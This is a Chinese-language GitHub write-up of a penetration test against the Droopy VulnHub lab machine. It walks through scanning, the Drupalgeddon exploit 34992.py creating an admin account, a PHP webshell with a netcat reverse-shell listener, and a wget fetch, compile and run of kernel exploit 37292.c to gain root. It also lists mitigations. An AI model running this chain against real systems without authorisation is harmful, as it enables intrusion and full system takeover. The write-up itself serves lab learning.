Salik921/Droopy-Vuln-Hub-Writeup
GitHub: Salik921/Droopy-Vuln-Hub-Writeup
Droopy VulnHub靶机的完整渗透测试walkthrough,涵盖Drupal 7 SQL注入利用、Webshell上传及Linux内核提权的全流程攻击链演示。
Stars: 0 | Forks: 0
# 🛡️ Droopy (VulnHub) – 远程利用与权限提升
## 📌 描述
本项目演示了对 **Droopy (VulnHub)** 机器的完整渗透过程,通过利用过时的 **Drupal 7 CMS** 并借助一个**内核级权限提升漏洞**完成攻击。攻击链包括侦察、漏洞识别、漏洞利用以及获取 **root 权限**。
⚠️ **注意:** 此测试是在受控实验室环境中进行的,仅用于教育目的。
## 🛠 使用的工具
* Nmap
* Nikto
* Searchsploit
* Python3
* Netcat
* GCC 编译器
* Kali Linux
## 🧪 漏洞类型
* 过时的 CMS (Drupal 7)
* SQL 注入 (基于漏洞利用)
* 远程代码执行 (RCE)
* 内核权限提升
## 方法论
评估过程中采用了以下方法论:
* 执行网络扫描以识别开放端口
* 对 Web 应用程序进行技术和漏洞枚举
* 识别过时的 Drupal CMS
* 研究公开可用的漏洞利用程序
* 通过漏洞利用获取初始访问权限
* 上传 Webshell 以执行命令
* 执行本地枚举
* 利用内核漏洞提升权限
* 实现完整的系统沦陷
## 🔍 漏洞利用步骤
### 1️⃣ 侦察
* 执行 Nmap 扫描以识别开放端口
* 发现端口 80 上运行着 HTTP 服务
```
nmap -sC -sV
```
📸 截图:
https://github.com/Salik921/Droopy-Vuln-Hub-Writeup/blob/5487ed0030f1d058baf47b3cd27aa3d136b0d5e2/Screenshot%202026-03-24%20203608.png
### 2️⃣ 枚举
* 使用 Nikto 扫描 Web 服务器
* 识别出 Drupal CMS
* 手动检查确认了 Drupal 结构
```
nikto -h http://
```
📸 截图:
https://github.com/Salik921/Droopy-Vuln-Hub-Writeup/blob/51f97365df72d89fd14865bccbd0155db72d9b4f/Screenshot%202026-03-24%20203812.png
### 3️⃣ 漏洞识别
* 使用 Searchsploit 搜索已知漏洞
```
searchsploit drupal 7
```
* 发现多个针对 Drupal 7 的漏洞利用程序
* 确认 CMS 版本已过时且存在漏洞
📸 截图:
https://github.com/Salik921/Droopy-Vuln-Hub-Writeup/blob/51f97365df72d89fd14865bccbd0155db72d9b4f/Screenshot%202026-03-24%20204215.png
### 4️⃣ 漏洞利用
* 使用了 Drupal 漏洞利用程序 (34992.py)
```
python3 34992.py -t http://<192.168.10.14>/ -u admin2 -p admin2
```
📌 Drupalgeddon SQL 注入漏洞利用程序 (34992.py)
此脚本 (34992.py) 是一个基于 Python 的漏洞利用程序,针对 Drupal 7(版本 7.0 至 7.31)中的一个严重 SQL 注入漏洞,该漏洞广为人知,被称为 Drupalgeddon。
该漏洞的存在是由于对数据库查询中用户提供的输入处理不当,允许攻击者在未经身份验证的情况下注入恶意 SQL 命令。
⚙️ 影响
未经授权的数据库访问
创建管理员账户
完全沦陷网站
远程代码执行(在某些情况下)
* 成功创建了管理员账户
* 获得了管理面板的访问权限
📸 截图:
https://github.com/Salik921/Droopy-Vuln-Hub-Writeup/blob/51f97365df72d89fd14865bccbd0155db72d9b4f/Screenshot%202026-03-24%20204425.png
### 5️⃣ 初始访问 (Webshell)
* 导航至管理面板中的“添加内容”
* 上传了恶意的 PHP Webshell
* 启动了 Netcat 监听器
```
nc -lvnp 4444
```
* 触发了反向 Shell
📸 截图:
https://github.com/Salik921/Droopy-Vuln-Hub-Writeup/blob/51f97365df72d89fd14865bccbd0155db72d9b4f/Screenshot%202026-03-24%20205117.png
### 6️⃣ 后渗透
* 枚举了系统信息
```
uname -a
lsb_release -a
```
* 识别了内核版本
📸 截图:
https://github.com/Salik921/Droopy-Vuln-Hub-Writeup/blob/51f97365df72d89fd14865bccbd0155db72d9b4f/Screenshot%202026-03-24%20205117.png
### 7️⃣ 权限提升
* 搜索了内核漏洞利用程序
```
searchsploit linux | grep -i 3.13 | grep -i kernal
```
* 发现了漏洞利用程序 (37292.c)
📸 截图:
https://github.com/Salik921/Droopy-Vuln-Hub-Writeup/blob/8a4d5ac4b7d9401e72bbfc57d4d25bb563478ade/Screenshot%202026-03-28%20132712.png
### 传输漏洞利用程序
```
python3 -m http.server 8000
wget http://<192.168.10.14>:8000/37292.c
```
### 编译与执行
```
gcc 37292.c -o exploit
chmod +x exploit
./exploit
```
* 成功获取 Root 访问权限
📸 截图:
https://github.com/Salik921/Droopy-Vuln-Hub-Writeup/blob/82a2c7a13e4526b9c88027647f797932154be1f5/Screenshot%202026-03-24%20205637.png
## 💥 影响
* 完整的系统沦陷
* 获得了 Root 级别访问权限
* 能够执行任意命令
## 🔐 缓解与预防
* 保持 CMS 更新(避免使用过时的 Drupal 版本)
* 定期应用安全补丁
* 禁用不必要的模块
* 限制管理员访问
* 监控日志中的可疑活动
* 加固 Linux 内核并限制漏洞利用途径
## 📚 学习成果
本项目演示了真实的渗透测试工作流程,包括:
* Web 应用程序枚举
* 漏洞利用的研究与使用
* 通过 CMS 漏洞获取初始访问权限
* 权限提升技术
* 实现完整的系统沦陷
## ⚠️ 免责声明
本项目**仅用于教育目的**。请勿在未经适当授权的情况下尝试利用系统。
## 👨💻 作者
**Salik Karimkhan**
* 渴望成长的渗透测试人员 💀
标签:CISA项目, CTF学习, CTI, Cutter, Drupal 7, Nikto, Nmap, RCE, Searchsploit, VulnHub, Webshell, Web安全, Web报告查看器, 内核漏洞, 内网渗透, 初始访问, 协议分析, 密码管理, 提权, 插件系统, 权限提升, 编程工具, 网络安全, 蓝队分析, 虚拟驱动器, 远程代码执行, 逆向工具, 隐私保护, 靶场攻略